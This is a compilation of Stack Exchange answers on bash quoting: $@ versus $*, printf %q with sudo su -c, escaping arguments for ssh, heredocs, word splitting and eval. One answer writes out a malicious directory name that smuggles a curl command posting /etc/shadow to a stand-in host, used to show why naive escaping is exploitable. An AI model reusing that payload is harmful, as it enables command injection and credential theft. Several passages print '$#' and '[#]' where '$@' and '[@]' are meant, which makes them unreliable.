bash parameter variables in script problem

I have a script I wrote for switching to root or running a command as root without a password. I edited my /etc/sudoers file so that my user [matt] has permission to run /bin/su with no password. This is my script "s" contents:
matt: ~ $ cat ~/bin/s
#!/bin/bash
[ "$1" != "" ] && c='-c'
sudo su $c "$*"
If there are no parameters [simply s], it basically calls sudo su, which goes to root with no password. But if I pass parameters, the $c variable equals "-c", which makes su execute a single command.
It works well, except when I need to use spaces. For example:
matt: ~ $ touch file\ with\ spaces
matt: ~ $ s chown matt file\ with\ spaces
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file with spaces'
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file\ with\ spaces'
matt: ~ $
How can I fix this?
Also, what's the difference between $* and $@ ?

Ah, fun with quoting. Usually, the approach @John suggests will work for this: use "$@", and it won't try to interpret (and get confused by) the spaces and other funny characters in your parameters. In this case, however, that won't work, because su's -c option expects the entire command to be passed as a single parameter; it then starts a new shell which parses the command (including getting confused by spaces and such). To avoid this, you actually need to re-quote the parameters within the string you're going to pass to su -c. bash's printf builtin can do this:
#!/bin/bash
if [ $# -gt 0 ]; then
    sudo su -c "$(printf '%q ' "$@")"
else
    sudo su
fi
Let me go over what's happening here:
You run a command like s chown matt file\ with\ spaces
bash parses this into a list of words: "s" "chown" "matt" "file with spaces". Note that at this point the escapes you typed have been removed (although they had their intended effect: making bash treat those spaces as part of a parameter, rather than separators between parameters).
When bash parses the printf '%q ' "$@" command in the script, it replaces "$@" with the arguments to the script, with parameter breaks intact. It's equivalent to printf '%q ' "chown" "matt" "file with spaces".
printf interprets the format string "%q " to mean "print each remaining parameter in quoted form, with a space after it". It prints: "chown matt file\ with\ spaces ", essentially reconstructing the original command line (it has an extra space on the end, but this turns out not to be a problem).
This is then passed to sudo as a parameter (since there are double-quotes around the $() construct, it'll be treated as a single parameter to sudo). This is equivalent to running sudo su -c "chown matt file\ with\ spaces ".
sudo runs su, and passes along the rest of the parameter list it got including the fully escaped command.
su runs a shell, and it also passes along the rest of its parameter list.
The shell executes the command it got as an argument to -c: chown matt file\ with\ spaces. In the normal course of parsing it, it'll interpret the unescaped spaces as separators between parameters, and the escaped spaces as part of a parameter, and it'll ignore the extra space at the end.
The shell runs chown, with the parameters "matt" and "file with spaces". This does what you expected.
Isn't bash parsing a hoot?
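The quoting round trip can be checked in isolation (a sketch using the same hypothetical arguments as above):

```shell
#!/bin/bash
# Simulate the script's arguments, then re-quote them with printf %q.
set -- chown matt "file with spaces"
quoted=$(printf '%q ' "$@")
echo "$quoted"
# chown matt file\ with\ spaces
# Re-parsing the quoted string recovers the original three words:
eval "printf '%s\n' $quoted"
# chown
# matt
# file with spaces
```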

"$*" collects all the positional parameters ($1, $2, …) into a single word, separated by one space (more generally, the first character of $IFS). Note that in shell terminology, a word can include any character including spaces: "foo bar" or foo\ bar parses to a single word. For example, if there are three arguments, then "$*" is equivalent to "$1 $2 $3". If there is no argument, then "$*" is equivalent to "" (an empty word).
"$#" is a special syntax that expands to the list of positional parameters, each in its own word. For example, if there are three arguments, then "$#" is equivalent to "$1" "$2" "$3". If there is no argument, then "$#" is equivalent to nothing (an empty list, not a list with one word that is empty).
"$#" is almost always what you want to use, as opposed to "$*", or unquoted $* or $# (the last two are exactly equivalent and perform filename generation (a.k.a. globbing) and word splitting on all the positional parameters).
There's an additional problem, which is that su expects a single shell command as the argument of -c, and you're passing it multiple words. You've had a detailed explanation of getting the quoting right, but let me add advice on how to do it right, which sidesteps the double-quoting issue. You may also want to refer to https://unix.stackexchange.com/questions/3063/how-do-i-run-a-command-as-the-system-administrator-root for more background on sudo and su.
sudo already runs a command as root, so there's no need to invoke su. In case your script has no arguments, you can just run a shell directly; unless your version of sudo is very old, there's an option for that: sudo -s. So your script can be:
#!/bin/sh
if [ $# -eq 0 ]; then set -- -s; else set -- -- "$@"; fi
exec sudo "$@"
(The else part is to handle the rare case of a command that begins with -.)
I wouldn't bother with such a short script though. Running a command as root is unusual and risky enough that typing the three extra characters shouldn't be a problem. Running a shell as root is even more unusual and risky and surely deserves six more characters.

Related

What does $"${@// /\\ }" mean in bash?

When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"
The "${@// /\\ }" part is an ordinary parameter expansion. Why add a $ before it? What does this $"..." mean?
This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, is passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${@// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
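For concreteness, here's what the space-only substitution produces (a sketch with hypothetical arguments):

```shell
#!/bin/bash
# Each space in each argument gains a leading backslash; nothing else changes.
set -- 'hello world' 'goodbye world'
printf '<%s>\n' "${@// /\\ }"
# <hello\ world>
# <goodbye\ world>
# A tab, a newline, or a $(...) inside an argument would pass through untouched.
```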
Aside: What's the leading $ in $"${@/...//...}" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while IFS= read -r -d '' path; do
    ssh "$host" "mkdir -p $path"
done < <(find "$src" -type d -printf '%P\0')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$@"
# on the remote system, run "bash -s", with the script to run fed on stdin;
# this guarantees that the remote shell is bash, which is what printf %q
# quotes content to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
    python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$@"
}
cmd_str=$(posix_quote "$@")
ssh "$slave" "$cmd_str"
Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${@// /\\ } will quote this whitespace so that the expansion which takes place next will keep the whitespace as part of the argument for another command.
Anyway, an example is probably in order. Create a tst.sh with the line above and make it executable.
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"' >> tst.sh
chmod +x tst.sh
try to run a mkdir command on the remote server, aka slave, of a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid@server ls /tmp
And if you're in a different country and really wanted some non-English characters, those are maintained by the surrounding $"...", aka locale-specific translation.

How to handle shell script arguments in heredoc?

I need to switch to oracle user to change permissions to tnsnames.ora file. I am passing this file path as argument but looks like somewhere the syntax is wrong. Appreciate help in fixing this issue.
Below is the piece of my script.
#!/bin/bash
sudo su - oracle <<-"EOF"
chmod 777 "$1"
EOF
It is failing by giving the following error:
/home/itsh->./dothis.sh /home/oracle/orasys/11.2.0.2/network/admin/tnsnames.ora
chmod: cannot access `': No such file or directory
If you're in any way concerned about security, the right thing to do is not to change your quoting, but to keep it as it is and use bash -s to pass your arguments to the shell running as the oracle user directly:
#!/bin/bash
sudo -u oracle bash -s "$@" <<-'EOF'
chmod 777 "$1"
EOF
...or, if you must use sudo su - oracle (which I'd argue is bad practice, and best avoided):
#!/bin/bash
printf -v sudo_cmd '%q ' bash -s "$@"
sudo su - oracle -c "$sudo_cmd" <<-'EOF'
chmod 777 "$1"
EOF
With either of these practices, your inner shell runs the $1 expansion itself -- and the data on the command line isn't substituted into, and parsed as, code.
The operation of a here document is specified in the POSIX spec where it says:
If any character in word is quoted, the delimiter shall be formed by performing quote removal on word, and the here-document lines shall not be expanded. Otherwise, the delimiter shall be the word itself.
If no characters in word are quoted, all lines of the here-document shall be expanded for parameter expansion, command substitution, and arithmetic expansion. In this case, the <backslash> in the input behaves as the <backslash> inside double-quotes (see Double-Quotes). However, the double-quote character ( '"' ) shall not be treated specially within a here-document, except when the double-quote appears within "$()", "``", or "${}".
So by using <<-"EOF" (instead of <<-EOF) as your here document marker you are explicitly telling the shell not to expand any variables (from the shell context) in the here document contents.
This is often what you want when you are using a heredoc for a shell snippet but in your case this is exactly the opposite of what you appear to be looking for.
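A minimal side-by-side sketch of the two delimiter styles:

```shell
#!/bin/bash
# An unquoted heredoc delimiter expands variables; a quoted one does not.
name=oracle
cat <<EOF
user: $name
EOF
# user: oracle
cat <<'EOF'
user: $name
EOF
# user: $name
```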

use argument containing spaces in bash

I know about escaping, quoting and stuff, but still have a problem.
If you have a script containing "cd $1" and call it with an argument containing spaces, cd will always return an error message: it stops at the first space and can't find the directory. I tried protecting the arguments in every way:
ls -l
+-rwx... script
+drwx... dir with spaces/
cat script
+cd $1
script dir with spaces
+cd: dir: no such file or directory
script "dir with spaces"
+cd: dir: no such file or directory
script dir\ with\ spaces
+cd: dir\: no such file or directory
but none will work.
I feel like I'm missing the obvious, thanks for enlightening me.
You need to quote the expansion "$1" inside the script to prevent it from being word-split, in addition to quoting the string passed to the script so it arrives as a single argument.
So
$ cat script.sh
cd -- "$1"
$ ./script.sh "dir with spaces"
Edit: As gniourf_gniourf correctly pointed out using -- as the first argument to cd prevents problems should paths ever start with -.
Use double quotes on the variable
cd "$1"

Why doesn't zsh syntax work in this script?

I'm just trying to understand what is happening here, so that I understand how to parse strings in shell scripts better.
I know that usually, when you try to pass a string of arguments separated by spaces directly to a command, they will be treated as a single string argument and therefore not recognized:
>check="FileA.txt FileB.txt"
>ls $check
ls: cannot access FileA.txt FileB.txt: No such file or directory
However, in this script two arguments are each taken as space-separated strings. In this case, both strings are recognized as lists of arguments that can be passed to different commands:
testscript.sh
while getopts o:p: arguments
do
    case $arguments in
        o) olist="$OPTARG";;
        p) plist=$OPTARG;;
    esac
done
echo "olist"
ls -l $olist
echo "plist"
ls -l $plist
the output is then as follows:
>testscript.sh -o "fileA.txt fileB.txt" -p "file1.txt file2.txt"
olist
fileA.txt
fileB.txt
plist
file1.txt
file2.txt
What is different here? Why are the space separated strings suddenly recognized as lists?
Your script does not start with a #!-line and therefore does not specify an interpreter. In that case the default is used, which is /bin/sh and not your login shell or the shell you are starting the script from (unless that is /bin/sh of course). Chances are good that /bin/sh is not a zsh, as most distributions and Unices seem to use sh, bash, dash or ksh as the default shell. All of these handle parameter expansion such that strings are treated as lists if the parameter was not quoted with double-quotes.
If you want to use zsh as interpreter for your scripts, you have to specify it in the first line of the script:
#!/usr/bin/zsh
Modify the path to wherever your zsh resides.
You can also use env as a wrapper:
#!/usr/bin/env zsh
This makes you more independent of the actual location of zsh, it just has to be in $PATH.
As a matter of fact (using bash)...
sh$ check="FileA.txt FileB.txt"
sh$ ls $check
ls: cannot access FileA.txt: No such file or directory
ls: cannot access FileB.txt: No such file or directory
When you write $check without quotes, the variable is substituted by its content. The inner spaces (or, to be precise, occurrences of characters in IFS) are treated as field separators. Just as you were expecting at first.
The only way I know to reproduce your behavior is to set IFS to something else than its default value:
sh$ export IFS="-"
sh$ check="FileA.txt FileB.txt"
sh$ ls $check
ls: cannot access FileA.txt FileB.txt: No such file or directory
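A sketch of the splitting behaviour with the default IFS (works in any POSIX shell):

```shell
#!/bin/sh
# An unquoted expansion undergoes word splitting; a quoted one does not.
check="FileA.txt FileB.txt"
set -- $check      # unquoted: split on whitespace
echo $#            # 2
set -- "$check"    # quoted: kept as a single word
echo $#            # 1
```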

Bash eval replacement $() not always equivalent?

Everybody says eval is evil, and you should use $() as a replacement. But I've run into a situation where the unquoting isn't handled the same inside $().
Background is that I've been burned too often by file paths with spaces in them, and so like to quote all such paths. More paranoia about wanting to know where all my executables are coming from. Even more paranoid, not trusting myself, and so like being able to display the created commands I'm about to run.
Below I try variations on using eval vs. $(), and whether the command name is quoted (cuz it could contain spaces)
BIN_LS="/bin/ls"
thefile="arf"
thecmd="\"${BIN_LS}\" -ld -- \"${thefile}\""
echo -e "\n Running command '${thecmd}'"
$($thecmd)
Running command '"/bin/ls" -ld -- "arf"'
./foo.sh: line 8: "/bin/ls": No such file or directory
echo -e "\n Eval'ing command '${thecmd}'"
eval $thecmd
Eval'ing command '"/bin/ls" -ld -- "arf"'
/bin/ls: cannot access arf: No such file or directory
thecmd="${BIN_LS} -ld -- \"${thefile}\""
echo -e "\n Running command '${thecmd}'"
$($thecmd)
Running command '/bin/ls -ld -- "arf"'
/bin/ls: cannot access "arf": No such file or directory
echo -e "\n Eval'ing command '${thecmd}'"
eval $thecmd
Eval'ing command '/bin/ls -ld -- "arf"'
/bin/ls: cannot access arf: No such file or directory
$("/bin/ls" -ld -- "${thefile}")
/bin/ls: cannot access arf: No such file or directory
So... this is confusing. A quoted command path is valid everywhere except inside a $() construct? A shorter, more direct example:
$ c="\"/bin/ls\" arf"
$ $($c)
-bash: "/bin/ls": No such file or directory
$ eval $c
/bin/ls: cannot access arf: No such file or directory
$ $("/bin/ls" arf)
/bin/ls: cannot access arf: No such file or directory
$ "/bin/ls" arf
/bin/ls: cannot access arf: No such file or directory
How does one explain the simple $($c) case?
The use of " to quote words is part of your interaction with Bash. When you type
$ "/bin/ls" arf
at the prompt, or in a script, you're telling Bash that the command consists of the words /bin/ls and arf, and the double-quotes are really emphasizing that /bin/ls is a single word.
When you type
$ eval '"/bin/ls" arf'
you're telling Bash that the command consists of the words eval and "/bin/ls" arf. Since the purpose of eval is to pretend that its argument is an actual human-input command, this is equivalent to running
$ "/bin/ls" arf
and the " gets processed just like at the prompt.
Note that this pretense is specific to eval; Bash doesn't usually go out of its way to pretend that something was an actual human-typed command.
When you type
$ c='"/bin/ls" arf'
$ $c
the $c gets substituted, and then undergoes word splitting (see §3.5.7 "Word Splitting" in the Bash Reference Manual), so the words of the command are "/bin/ls" (note the double-quotes!) and arf. Needless to say, this doesn't work. (It's also not very safe, since in addition to word-splitting, $c also undergoes filename-expansion and whatnot. Generally your parameter-expansions should always be in double-quotes, and if they can't be, then you should rewrite your code so they can be. Unquoted parameter-expansions are asking for trouble.)
When you type
$ c='"/bin/ls" arf'
$ $($c)
this is the same as before, except that now you're also trying to use the output of the nonworking command as a new command. Needless to say, that doesn't cause the nonworking command to suddenly work.
As Ignacio Vazquez-Abrams says in his answer, the right solution is to use an array, and handle the quoting properly:
$ c=("/bin/ls" arf)
$ "${c[#]}"
which sets c to an array with two elements, /bin/ls and arf, and uses those two elements as the word of a command.
With the fact that it doesn't make sense in the first place. Use an array instead.
$ c=("/bin/ls" arf)
$ "${c[#]}"
/bin/ls: cannot access arf: No such file or directory
From the man page for bash, regarding eval:
eval [arg ...]:
The args are read and concatenated together into a single command.
This command is then read and executed by the shell, and its exit
status is returned as the value of eval.
When c is defined as "\"/bin/ls\" arf", the outer quotes will cause the entire thing to be processed as the first argument to eval, which is expected to be a command or program. You need to pass your eval arguments in such a way that the target command and its arguments are listed separately.
The $(...) construct behaves differently than eval because it is not a command that takes arguments. It can process the entire command at once instead of processing arguments one at a time.
A note on your original premise: The main reason that people say that eval is evil was because it is commonly used by scripts to execute a user-provided string as a shell command. While handy at times, this is a major security problem (there's typically no practical way to safety-check the string before executing it). The security problem doesn't apply if you are using eval on hard-coded strings inside your script, as you are doing. However, it's typically easier and cleaner to use $(...) or `...` inside of scripts for command substitution, leaving no real use case left for eval.
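To make the array recommendation concrete, here's a self-contained sketch (printf stands in for ls so it runs anywhere):

```shell
#!/bin/bash
# Store the command as an array: one element per word, spaces preserved,
# no eval and no re-parsing needed.
cmd=(printf '%s\n' "file with spaces")
echo "About to run: ${cmd[*]}"   # display form, for logging only
"${cmd[@]}"                      # execute: each array element is one word
# file with spaces
```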
Using set -vx helps us understand how bash processes the command string.
With tracing enabled, you can see that the quotes around "command" are stripped during processing. However, when $c (quoted twice) is used, only the outer single quotes are removed. eval processes the string as its argument, so the quotes are removed step by step.
It comes down to how bash semantically processes the string and its quotes.
Bash does have many weird behaviours about quotes processing:
Bash inserting quotes into string before execution
How do you stop bash from stripping quotes when running a variable as a command?
Bash stripping quotes - how to preserve quotes
